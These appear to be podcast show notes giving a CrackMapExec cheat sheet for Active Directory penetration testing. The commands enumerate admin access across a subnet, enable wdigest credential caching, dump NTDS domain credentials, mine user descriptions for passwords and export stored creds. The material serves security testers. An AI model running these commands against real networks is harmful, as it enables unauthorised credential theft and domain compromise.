7 Minute Security

Mar 10, 2023

Hey friends, today we're covering part 2 of our series all about cracking and mapping and execing with CrackMapExec. Specifically we cover:

# Enumerate where your user has local admin rights:
cme smb x.x.x.x/24 -u user -p password

# Set wdigest flag:
cme smb x.x.x.x -u user -p password -M wdigest -o ACTION=enable

# Dump AD creds:
cme smb IP.OF.DOMAIN.CONTROLLER -u user -p password --ntds --enabled

# Clean up AD dump output:
cat /path/to/file.ntds | grep -iv disabled | cut -d ':' -f1,4 | grep -v '\$' | sort

# Check ms-ds-machineaccountquota:
cme ldap x.x.x.x -u user -p password -M maq

# Check for Active Directory Certificate Services:
cme ldap x.x.x.x -u user -p password -M adcs

# Pull all AD user descriptions:
cme ldap x.x.x.x -u user -p password -M get-desc-users

# Pull all AD user descriptions down to a file and search for users with "pass" in description:
cme ldap x.x.x.x -u user -p password -M user-desc

# CrackMapExec database (CME)

## Clear database
sudo rm -r ~/.cme

## Handy commands inside the cmedb prompt:
hosts
shares
creds
export shares detailed shares.csv
export creds detailed creds.txt